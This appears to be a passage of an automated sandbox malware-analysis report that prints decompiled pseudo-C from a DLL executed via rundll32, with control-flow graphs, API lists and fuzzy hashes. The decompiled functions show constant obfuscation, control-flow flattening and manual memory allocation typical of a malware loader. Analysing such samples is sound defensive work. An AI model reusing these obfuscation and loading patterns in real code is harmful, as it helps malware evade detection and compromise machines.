                                                                                                                    																		_t278 =  *0x10055a84; // 0x1
                                                                                                                    																		_t326 =  *0x10055a80; // 0x10000000
                                                                                                                    																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                    																		if(_v92 != 0) {
                                                                                                                    																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                    																			goto L47;
                                                                                                                    																		}
                                                                                                                    																		SetLastError(0x45a);
                                                                                                                    																		L50:
                                                                                                                    																		E10002840(_v100, _v72);
                                                                                                                    																		return 0;
                                                                                                                    																	}
                                                                                                                    																	goto L50;
                                                                                                                    																}
                                                                                                                    																goto L50;
                                                                                                                    															}
                                                                                                                    															goto L50;
                                                                                                                    														}
                                                                                                                    														goto L50;
                                                                                                                    													}
                                                                                                                    													goto L50;
                                                                                                                    												}
                                                                                                                    												VirtualFree(_v24, 0, 0x8000);
                                                                                                                    												SetLastError(0xe);
                                                                                                                    												return 0;
                                                                                                                    											}
                                                                                                                    											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                    											_v24 = _t220;
                                                                                                                    											if(_v24 != 0) {
                                                                                                                    												goto L26;
                                                                                                                    											}
                                                                                                                    											SetLastError(0xe);
                                                                                                                    											return 0;
                                                                                                                    										}
                                                                                                                    										SetLastError(0xc1);
                                                                                                                    										return 0;
                                                                                                                    									}
                                                                                                                    									SetLastError(0xc1);
                                                                                                                    									return 0;
                                                                                                                    								}
                                                                                                                    								SetLastError(0xc1);
                                                                                                                    								return 0;
                                                                                                                    							}
                                                                                                                    							SetLastError(0xc1);
                                                                                                                    							return 0;
                                                                                                                    						}
                                                                                                                    						return 0;
                                                                                                                    					}
                                                                                                                    					SetLastError(0xc1);
                                                                                                                    					return 0;
                                                                                                                    				}
                                                                                                                    				return 0;
                                                                                                                    			}





























                                                                                                                    0x100024d4
                                                                                                                    0x100024dd
                                                                                                                    0x100024e6
                                                                                                                    0x100024ef
                                                                                                                    0x100024f8
                                                                                                                    0x10002510
                                                                                                                    0x1000252e
                                                                                                                    0x10002534
                                                                                                                    0x10002546
                                                                                                                    0x10002554
                                                                                                                    0x1000255a
                                                                                                                    0x10002564
                                                                                                                    0x1000257a
                                                                                                                    0x10002581
                                                                                                                    0x10002598
                                                                                                                    0x1000259b
                                                                                                                    0x1000259e
                                                                                                                    0x100025bb
                                                                                                                    0x100025a0
                                                                                                                    0x100025b3
                                                                                                                    0x100025b3
                                                                                                                    0x100025d0
                                                                                                                    0x100025e3
                                                                                                                    0x100025ea
                                                                                                                    0x10002604
                                                                                                                    0x10002616
                                                                                                                    0x10002680
                                                                                                                    0x10002687
                                                                                                                    0x00000000
                                                                                                                    0x10002687
                                                                                                                    0x1000261f
                                                                                                                    0x10002678
                                                                                                                    0x1000267b
                                                                                                                    0x00000000
                                                                                                                    0x1000267b
                                                                                                                    0x1000262c
                                                                                                                    0x1000262f
                                                                                                                    0x10002635
                                                                                                                    0x1000263c
                                                                                                                    0x10002646
                                                                                                                    0x1000264d
                                                                                                                    0x10002661
                                                                                                                    0x00000000
                                                                                                                    0x10002661
                                                                                                                    0x10002654
                                                                                                                    0x1000268c
                                                                                                                    0x10002693
                                                                                                                    0x00000000
                                                                                                                    0x10002698
                                                                                                                    0x00000000
                                                                                                                    0x10002606
                                                                                                                    0x00000000
                                                                                                                    0x100025ec
                                                                                                                    0x00000000
                                                                                                                    0x100025d2
                                                                                                                    0x00000000
                                                                                                                    0x10002583
                                                                                                                    0x00000000
                                                                                                                    0x10002512
                                                                                                                    0x10002497
                                                                                                                    0x1000249f
                                                                                                                    0x00000000
                                                                                                                    0x100024a5
                                                                                                                    0x10002454
                                                                                                                    0x1000245a
                                                                                                                    0x10002461
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002465
                                                                                                                    0x00000000
                                                                                                                    0x1000246b
                                                                                                                    0x10002419
                                                                                                                    0x00000000
                                                                                                                    0x1000241f
                                                                                                                    0x10002353
                                                                                                                    0x00000000
                                                                                                                    0x10002359
                                                                                                                    0x10002336
                                                                                                                    0x00000000
                                                                                                                    0x1000233c
                                                                                                                    0x10002315
                                                                                                                    0x00000000
                                                                                                                    0x1000231b
                                                                                                                    0x00000000
                                                                                                                    0x100022f2
                                                                                                                    0x100022c8
                                                                                                                    0x00000000
                                                                                                                    0x100022ce
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 148 33f8fd-33fddc 149 33fde0-33fde6 148->149 150 33ffa3-33ffbe call 334b61 149->150 151 33fdec-33fdf2 149->151 161 33ffc3-33ffc9 150->161 152 33ffd1-33ffe9 call 33ab87 151->152 153 33fdf8-33fdfe 151->153 162 33ffee-33fff3 152->162 155 33fe04-33fe0a 153->155 156 33ff5e-33ff64 153->156 159 33fe10-33fe16 155->159 160 33ff49-33ff59 call 33f899 155->160 163 33ff66-33ff6a 156->163 164 33ff99-33ff9e 156->164 165 33fe18-33fe1e 159->165 166 33fe8f-33feae call 3446bb 159->166 160->149 161->149 167 33ffcf 161->167 169 33fff4-340000 162->169 170 33ff91-33ff97 163->170 171 33ff6c-33ff73 163->171 164->149 165->161 172 33fe24-33fe5e call 34dcf7 call 33b23c 165->172 179 33feb3-33ff44 call 34da22 call 34dcf7 call 3347ce call 33a8b0 166->179 167->169 170->163 170->164 175 33ff81-33ff8a 171->175 186 33fe63-33fe8a call 33a8b0 172->186 176 33ff75-33ff79 175->176 177 33ff8c-33ff8e 175->177 176->177 182 33ff7b-33ff7e 176->182 177->170 179->149 182->175 186->161
                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E0033F8FD() {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				char _v1560;
                                                                                                                    				signed int _v1564;
                                                                                                                    				signed int _v1568;
                                                                                                                    				signed int _v1572;
                                                                                                                    				signed int _v1576;
                                                                                                                    				signed int _v1580;
                                                                                                                    				signed int _v1584;
                                                                                                                    				signed int _v1588;
                                                                                                                    				signed int _v1592;
                                                                                                                    				signed int _v1596;
                                                                                                                    				signed int _v1600;
                                                                                                                    				signed int _v1604;
                                                                                                                    				signed int _v1608;
                                                                                                                    				signed int _v1612;
                                                                                                                    				signed int _v1616;
                                                                                                                    				signed int _v1620;
                                                                                                                    				signed int _v1624;
                                                                                                                    				signed int _v1628;
                                                                                                                    				signed int _v1632;
                                                                                                                    				signed int _v1636;
                                                                                                                    				signed int _v1640;
                                                                                                                    				signed int _v1644;
                                                                                                                    				signed int _v1648;
                                                                                                                    				signed int _v1652;
                                                                                                                    				signed int _v1656;
                                                                                                                    				signed int _v1660;
                                                                                                                    				signed int _v1664;
                                                                                                                    				signed int _v1668;
                                                                                                                    				signed int _v1672;
                                                                                                                    				signed int _v1676;
                                                                                                                    				signed int _v1680;
                                                                                                                    				signed int _v1684;
                                                                                                                    				signed int _v1688;
                                                                                                                    				signed int _v1692;
                                                                                                                    				signed int _v1696;
                                                                                                                    				signed int _v1700;
                                                                                                                    				signed short* _t368;
                                                                                                                    				signed int _t381;
                                                                                                                    				signed int* _t383;
                                                                                                                    				signed int _t385;
                                                                                                                    				signed int _t386;
                                                                                                                    				signed int _t387;
                                                                                                                    				signed int _t388;
                                                                                                                    				signed int _t389;
                                                                                                                    				signed int _t390;
                                                                                                                    				signed int _t391;
                                                                                                                    				signed int _t392;
                                                                                                                    				signed int _t393;
                                                                                                                    				signed int _t394;
                                                                                                                    				signed int _t395;
                                                                                                                    				signed int _t405;
                                                                                                                    				signed int* _t438;
                                                                                                                    				void* _t439;
                                                                                                                    				signed short* _t445;
                                                                                                                    				signed int* _t446;
                                                                                                                    
                                                                                                                    				_t446 =  &_v1700;
                                                                                                                    				_v1636 = 0x636551;
                                                                                                                    				_t2 =  &_v1636; // 0x636551
                                                                                                                    				_t385 = 0x5e;
                                                                                                                    				_v1636 =  *_t2 / _t385;
                                                                                                                    				_t383 = 0;
                                                                                                                    				_t386 = 0x7a;
                                                                                                                    				_t439 = 0x12dab9f;
                                                                                                                    				_v1636 = _v1636 * 0x55;
                                                                                                                    				_v1636 = _v1636 ^ 0x0059e0ec;
                                                                                                                    				_v1616 = 0x84ec4b;
                                                                                                                    				_v1616 = _v1616 + 0xffff958e;
                                                                                                                    				_v1616 = _v1616 << 6;
                                                                                                                    				_v1616 = _v1616 ^ 0x212f9cfc;
                                                                                                                    				_v1624 = 0x57c2af;
                                                                                                                    				_v1624 = _v1624 / _t386;
                                                                                                                    				_v1624 = _v1624 >> 0xa;
                                                                                                                    				_v1624 = _v1624 ^ 0x000a9340;
                                                                                                                    				_v1676 = 0x94d6a3;
                                                                                                                    				_v1676 = _v1676 >> 3;
                                                                                                                    				_t387 = 0x41;
                                                                                                                    				_v1676 = _v1676 * 0x79;
                                                                                                                    				_v1676 = _v1676 * 0x68;
                                                                                                                    				_v1676 = _v1676 ^ 0x9280c2f7;
                                                                                                                    				_v1644 = 0x578290;
                                                                                                                    				_v1644 = _v1644 | 0x80e552f7;
                                                                                                                    				_v1644 = _v1644 + 0xffffd80b;
                                                                                                                    				_v1644 = _v1644 ^ 0x80feae5e;
                                                                                                                    				_v1652 = 0x70c956;
                                                                                                                    				_v1652 = _v1652 ^ 0x31ba76f8;
                                                                                                                    				_v1652 = _v1652 ^ 0x87f2510e;
                                                                                                                    				_v1652 = _v1652 ^ 0xb63594c0;
                                                                                                                    				_v1696 = 0x39dcdb;
                                                                                                                    				_v1696 = _v1696 * 0x22;
                                                                                                                    				_v1696 = _v1696 >> 0xf;
                                                                                                                    				_v1696 = _v1696 * 0x75;
                                                                                                                    				_v1696 = _v1696 ^ 0x000247c6;
                                                                                                                    				_v1572 = 0x793846;
                                                                                                                    				_v1572 = _v1572 + 0xfc60;
                                                                                                                    				_v1572 = _v1572 ^ 0x007fa213;
                                                                                                                    				_v1576 = 0x3629f6;
                                                                                                                    				_v1576 = _v1576 | 0x7f6cc17b;
                                                                                                                    				_v1576 = _v1576 ^ 0x7f7c74a2;
                                                                                                                    				_v1600 = 0x630dc0;
                                                                                                                    				_v1600 = _v1600 | 0x8a3170d6;
                                                                                                                    				_v1600 = _v1600 ^ 0x8a7fe201;
                                                                                                                    				_v1664 = 0xe79625;
                                                                                                                    				_v1664 = _v1664 * 0x57;
                                                                                                                    				_v1664 = _v1664 ^ 0xe47ae09a;
                                                                                                                    				_v1664 = _v1664 + 0xffff598f;
                                                                                                                    				_v1664 = _v1664 ^ 0xaac0e7d1;
                                                                                                                    				_v1648 = 0xac147c;
                                                                                                                    				_v1648 = _v1648 << 4;
                                                                                                                    				_v1648 = _v1648 / _t387;
                                                                                                                    				_v1648 = _v1648 ^ 0x00264750;
                                                                                                                    				_v1588 = 0x745952;
                                                                                                                    				_t98 =  &_v1588; // 0x745952
                                                                                                                    				_v1588 =  *_t98 * 0x3a;
                                                                                                                    				_v1588 = _v1588 ^ 0x1a53f4d8;
                                                                                                                    				_v1672 = 0x57a21b;
                                                                                                                    				_t388 = 0x49;
                                                                                                                    				_v1672 = _v1672 / _t388;
                                                                                                                    				_t389 = 0x63;
                                                                                                                    				_v1672 = _v1672 / _t389;
                                                                                                                    				_v1672 = _v1672 | 0xd6f4ed27;
                                                                                                                    				_v1672 = _v1672 ^ 0xd6feee0f;
                                                                                                                    				_v1620 = 0xc904e8;
                                                                                                                    				_t390 = 0x17;
                                                                                                                    				_v1620 = _v1620 * 0x6d;
                                                                                                                    				_v1620 = _v1620 + 0x178d;
                                                                                                                    				_v1620 = _v1620 ^ 0x5592dda0;
                                                                                                                    				_v1688 = 0x59d198;
                                                                                                                    				_v1688 = _v1688 | 0x5938a823;
                                                                                                                    				_v1688 = _v1688 ^ 0x788d0eee;
                                                                                                                    				_v1688 = _v1688 + 0xffff1978;
                                                                                                                    				_v1688 = _v1688 ^ 0x21fe2fab;
                                                                                                                    				_v1612 = 0xa097a2;
                                                                                                                    				_v1612 = _v1612 << 9;
                                                                                                                    				_v1612 = _v1612 / _t390;
                                                                                                                    				_v1612 = _v1612 ^ 0x02dc2d90;
                                                                                                                    				_v1700 = 0xb7b4a0;
                                                                                                                    				_t391 = 0x36;
                                                                                                                    				_v1700 = _v1700 / _t391;
                                                                                                                    				_v1700 = _v1700 >> 1;
                                                                                                                    				_v1700 = _v1700 | 0xee164e4b;
                                                                                                                    				_v1700 = _v1700 ^ 0xee1e6de5;
                                                                                                                    				_v1680 = 0xe4ad14;
                                                                                                                    				_v1680 = _v1680 | 0xe839ddc8;
                                                                                                                    				_v1680 = _v1680 ^ 0xfe881b96;
                                                                                                                    				_t392 = 0x42;
                                                                                                                    				_v1680 = _v1680 * 0x4e;
                                                                                                                    				_v1680 = _v1680 ^ 0xd7ed2c6e;
                                                                                                                    				_v1656 = 0xa710a4;
                                                                                                                    				_v1656 = _v1656 + 0xfffff8f1;
                                                                                                                    				_v1656 = _v1656 ^ 0xcc5b21c1;
                                                                                                                    				_v1656 = _v1656 ^ 0xccf98fb8;
                                                                                                                    				_v1628 = 0x5fc40d;
                                                                                                                    				_v1628 = _v1628 + 0xb682;
                                                                                                                    				_v1628 = _v1628 << 6;
                                                                                                                    				_v1628 = _v1628 ^ 0x181c8c04;
                                                                                                                    				_v1640 = 0xd7aa78;
                                                                                                                    				_v1640 = _v1640 + 0x8e1d;
                                                                                                                    				_v1640 = _v1640 / _t392;
                                                                                                                    				_v1640 = _v1640 ^ 0x0007a72a;
                                                                                                                    				_v1580 = 0xbf48f6;
                                                                                                                    				_t393 = 0x25;
                                                                                                                    				_v1580 = _v1580 * 0xd;
                                                                                                                    				_v1580 = _v1580 ^ 0x09b7b49e;
                                                                                                                    				_v1564 = 0xff195;
                                                                                                                    				_v1564 = _v1564 + 0x8c1b;
                                                                                                                    				_v1564 = _v1564 ^ 0x00104e06;
                                                                                                                    				_v1684 = 0xbf1e83;
                                                                                                                    				_v1684 = _v1684 / _t393;
                                                                                                                    				_t394 = 0x77;
                                                                                                                    				_v1684 = _v1684 / _t394;
                                                                                                                    				_v1684 = _v1684 + 0xa662;
                                                                                                                    				_v1684 = _v1684 ^ 0x0006fc0d;
                                                                                                                    				_v1596 = 0xc39bae;
                                                                                                                    				_v1596 = _v1596 << 2;
                                                                                                                    				_v1596 = _v1596 ^ 0x030cfbaf;
                                                                                                                    				_v1568 = 0x66568e;
                                                                                                                    				_v1568 = _v1568 | 0x44ac0d6e;
                                                                                                                    				_v1568 = _v1568 ^ 0x44e9cf2b;
                                                                                                                    				_v1692 = 0x3d2b27;
                                                                                                                    				_v1692 = _v1692 + 0x3fae;
                                                                                                                    				_t395 = 0x71;
                                                                                                                    				_v1692 = _v1692 / _t395;
                                                                                                                    				_v1692 = _v1692 + 0xffff1a11;
                                                                                                                    				_v1692 = _v1692 ^ 0xffffbf57;
                                                                                                                    				_v1632 = 0xb4dfda;
                                                                                                                    				_v1632 = _v1632 * 9;
                                                                                                                    				_v1632 = _v1632 >> 3;
                                                                                                                    				_v1632 = _v1632 ^ 0x00c4553b;
                                                                                                                    				_v1584 = 0x206e7a;
                                                                                                                    				_v1584 = _v1584 << 7;
                                                                                                                    				_v1584 = _v1584 ^ 0x10371375;
                                                                                                                    				_v1592 = 0x689459;
                                                                                                                    				_v1592 = _v1592 + 0xffffb773;
                                                                                                                    				_v1592 = _v1592 ^ 0x00637077;
                                                                                                                    				_v1660 = 0x8b14df;
                                                                                                                    				_v1660 = _v1660 << 0xd;
                                                                                                                    				_v1660 = _v1660 + 0x9803;
                                                                                                                    				_v1660 = _v1660 << 0xa;
                                                                                                                    				_v1660 = _v1660 ^ 0x71eeeb6f;
                                                                                                                    				_v1608 = 0x8e767e;
                                                                                                                    				_v1608 = _v1608 | 0xfaf7fbb6;
                                                                                                                    				_v1608 = _v1608 ^ 0xfaf9bdf5;
                                                                                                                    				_v1668 = 0xccd677;
                                                                                                                    				_v1668 = _v1668 * 0x78;
                                                                                                                    				_v1668 = _v1668 + 0xffff6b3d;
                                                                                                                    				_v1668 = _v1668 + 0xf0ff;
                                                                                                                    				_v1668 = _v1668 ^ 0x600a3b9e;
                                                                                                                    				_v1604 = 0x7c05f9;
                                                                                                                    				_v1604 = _v1604 + 0xd55a;
                                                                                                                    				_v1604 = _v1604 ^ 0x007aedaa;
                                                                                                                    				_t445 = _v1604;
                                                                                                                    				while(_t439 != 0x12dab9f) {
                                                                                                                    					if(_t439 == 0x2f8e73a) {
                                                                                                                    						_push(_v1604);
                                                                                                                    						_push(_t383);
                                                                                                                    						_push(_t395);
                                                                                                                    						_push(_t383);
                                                                                                                    						_push(_t383);
                                                                                                                    						_push(_v1668);
                                                                                                                    						_push(_t445);
                                                                                                                    						E0033AB87(_v1660, _v1608, __eflags);
                                                                                                                    						_t383 = 1;
                                                                                                                    						__eflags = 1;
                                                                                                                    						L23:
                                                                                                                    						return _t383;
                                                                                                                    					}
                                                                                                                    					if(_t439 == 0x92208ae) {
                                                                                                                    						_t368 = _t445;
                                                                                                                    						__eflags =  *_t445 - _t383;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							L18:
                                                                                                                    							_t439 = 0xeef82b0;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							goto L11;
                                                                                                                    						}
                                                                                                                    						do {
                                                                                                                    							L11:
                                                                                                                    							__eflags =  *_t368 - 0x2c;
                                                                                                                    							if( *_t368 != 0x2c) {
                                                                                                                    								goto L17;
                                                                                                                    							}
                                                                                                                    							_t438 =  &_v1560;
                                                                                                                    							while(1) {
                                                                                                                    								_t368 =  &(_t368[1]);
                                                                                                                    								_t405 =  *_t368 & 0x0000ffff;
                                                                                                                    								__eflags = _t405;
                                                                                                                    								if(_t405 == 0) {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    								__eflags = _t405 - 0x20;
                                                                                                                    								if(_t405 == 0x20) {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    								 *_t438 = _t405;
                                                                                                                    								_t438 =  &(_t438[0]);
                                                                                                                    								__eflags = _t438;
                                                                                                                    							}
                                                                                                                    							_t395 = 0;
                                                                                                                    							__eflags = 0;
                                                                                                                    							 *_t438 = 0;
                                                                                                                    							L17:
                                                                                                                    							_t368 =  &(_t368[1]);
                                                                                                                    							__eflags =  *_t368 - _t383;
                                                                                                                    						} while (__eflags != 0);
                                                                                                                    						goto L18;
                                                                                                                    					}
                                                                                                                    					if(_t439 == 0x99a67ee) {
                                                                                                                    						_t445 = E0033F899(_t395);
                                                                                                                    						_t439 = 0x92208ae;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t439 == 0x9e65a83) {
                                                                                                                    						_push(_v1612);
                                                                                                                    						_push(_v1636);
                                                                                                                    						_push(_v1688);
                                                                                                                    						_push( &_v520); // executed
                                                                                                                    						E003446BB(_v1672, _v1620); // executed
                                                                                                                    						E0034DA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
                                                                                                                    						_push(_v1564);
                                                                                                                    						_push(_v1580);
                                                                                                                    						E003347CE( &_v520, _v1684, _v1640, _v1596, _v1568, E0034DCF7(_v1640, 0x331140, __eflags),  &_v1040, _v1692, _v1632);
                                                                                                                    						_t395 = _v1584;
                                                                                                                    						E0033A8B0(_t395, _t375, _v1592);
                                                                                                                    						_t446 = _t446 - 0xc + 0x58;
                                                                                                                    						_t439 = 0x2f8e73a;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					_t457 = _t439 - 0xeef82b0;
                                                                                                                    					if(_t439 == 0xeef82b0) {
                                                                                                                    						_push(_v1696);
                                                                                                                    						_push(_v1652);
                                                                                                                    						_t381 = E0033B23C(_v1572, _v1576, E0034DCF7(_v1644, 0x3310c0, _t457), _v1600, _v1664,  &_v1560); // executed
                                                                                                                    						_t395 = _v1648;
                                                                                                                    						asm("sbb edi, edi");
                                                                                                                    						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
                                                                                                                    						E0033A8B0(_t395, _t379, _v1588);
                                                                                                                    						_t446 =  &(_t446[7]);
                                                                                                                    					}
                                                                                                                    					L20:
                                                                                                                    					if(_t439 != 0xdf158d7) {
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					goto L23;
                                                                                                                    				}
                                                                                                                    				E00334B61( &_v1560, 0x208, _v1616, _v1624);
                                                                                                                    				_pop(_t395);
                                                                                                                    				_t439 = 0x99a67ee;
                                                                                                                    				goto L20;
                                                                                                                    			}





























































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                    • API String ID: 1514166925-3316477785
                                                                                                                    • Opcode ID: 683082f08a09aa4e999562d2a4e96d4afbbc58673c1b02cc976c8a3cc7776b97
                                                                                                                    • Instruction ID: bd61ec28c797e6b941a09d81ff7d921c3f1c47bd0afc5ea15c9e80d9dd68c271
                                                                                                                    • Opcode Fuzzy Hash: 683082f08a09aa4e999562d2a4e96d4afbbc58673c1b02cc976c8a3cc7776b97
                                                                                                                    • Instruction Fuzzy Hash: 5A022F725083808FD368CF25C58AA1BFBE2BBC5718F508A1DF5D98A260D7B59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 267 33e991-33ea60 268 33ea62-33ea77 call 33f8fd 267->268 269 33ea90-33ea96 267->269 268->269 272 33ea79-33ea88 call 3393ed 268->272 274 33ea8d 272->274 274->269
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			_entry_(intOrPtr _a4, char _a8) {
                                                                                                                    				unsigned int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				intOrPtr _v36;
                                                                                                                    				intOrPtr _v40;
                                                                                                                    				intOrPtr _v44;
                                                                                                                    				signed int _t85;
                                                                                                                    				signed int _t86;
                                                                                                                    				signed int _t87;
                                                                                                                    
                                                                                                                    				_v32 = _v32 & 0x00000000;
                                                                                                                    				_v44 = 0xa88528;
                                                                                                                    				_v40 = 0x811176;
                                                                                                                    				_v36 = 0xed2c64;
                                                                                                                    				_v20 = 0x893932;
                                                                                                                    				_v20 = _v20 ^ 0x2faf083b;
                                                                                                                    				_v20 = _v20 ^ 0x2f2d1c53;
                                                                                                                    				_v8 = 0xbe2d1;
                                                                                                                    				_t85 = 0x2e;
                                                                                                                    				_v8 = _v8 / _t85;
                                                                                                                    				_v8 = _v8 >> 0xd;
                                                                                                                    				_v8 = _v8 + 0xffff961f;
                                                                                                                    				_v8 = _v8 ^ 0xfff451d0;
                                                                                                                    				_v16 = 0x50855f;
                                                                                                                    				_v16 = _v16 >> 8;
                                                                                                                    				_t86 = 0x5e;
                                                                                                                    				_v16 = _v16 / _t86;
                                                                                                                    				_v16 = _v16 ^ 0x0002614f;
                                                                                                                    				_v28 = 0x752e5d;
                                                                                                                    				_t36 =  &_v28; // 0x752e5d
                                                                                                                    				_t87 = 0x4e;
                                                                                                                    				_v28 =  *_t36 * 0x6f;
                                                                                                                    				_v28 = _v28 ^ 0x32c1ec83;
                                                                                                                    				_v12 = 0xba9db2;
                                                                                                                    				_v12 = _v12 * 0x41;
                                                                                                                    				_v12 = _v12 + 0xfc46;
                                                                                                                    				_v12 = _v12 | 0x4911db39;
                                                                                                                    				_v12 = _v12 ^ 0x6f7f0271;
                                                                                                                    				_v24 = 0x2e0372;
                                                                                                                    				_v24 = _v24 / _t87;
                                                                                                                    				_v24 = _v24 ^ 0x000c7ca5;
                                                                                                                    				_t58 =  &_a8;
                                                                                                                    				 *_t58 = _a8 - 1;
                                                                                                                    				if( *_t58 == 0) {
                                                                                                                    					 *0x35320c = _a4;
                                                                                                                    					if(E0033F8FD() != 0) {
                                                                                                                    						E003393ED(); // executed
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return 1;
                                                                                                                    			}

















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID: ].u$d,
                                                                                                                    • API String ID: 621844428-1507873175
                                                                                                                    • Opcode ID: dd36eb932c41a05549509f7d942c7d93772477c841827cc0125d1f17d535e010
                                                                                                                    • Instruction ID: 17965df0b54315f671cfe4a78a591490a609b15c1b8f52000e1001b5f914c3ec
                                                                                                                    • Opcode Fuzzy Hash: dd36eb932c41a05549509f7d942c7d93772477c841827cc0125d1f17d535e010
                                                                                                                    • Instruction Fuzzy Hash: BF31F4B1D0020DEBDB08DFA4D98A6DEBBF0FB54314F208199D510BB250D7B45B859F80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 288 33ab87-33ad94 call 3420b9 call 334b61 call 337f5d 294 33ad99-33ad9e 288->294 295 33ada0-33ada2 294->295 296 33addd 294->296 297 33adb0-33addb call 341e67 * 2 295->297 298 33ada4-33adaa 295->298 299 33addf-33ade5 296->299 300 33adab-33adae 297->300 298->300 300->299
                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E0033AB87(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                    				void* _t151;
                                                                                                                    				void* _t163;
                                                                                                                    				void* _t164;
                                                                                                                    				signed int _t169;
                                                                                                                    				signed int _t170;
                                                                                                                    				signed int _t171;
                                                                                                                    				intOrPtr _t187;
                                                                                                                    				intOrPtr _t190;
                                                                                                                    				intOrPtr* _t193;
                                                                                                                    				void* _t194;
                                                                                                                    
                                                                                                                    				_t193 = _t194 - 0x5c;
                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x7c)));
                                                                                                                    				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x78)));
                                                                                                                    				_push(0);
                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x70)));
                                                                                                                    				_push(_t187);
                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x68)));
                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x64)));
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t151);
                                                                                                                    				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
                                                                                                                    				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
                                                                                                                    				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
                                                                                                                    				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
                                                                                                                    				 *(_t193 + 0x34) = 0xb35e3d;
                                                                                                                    				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
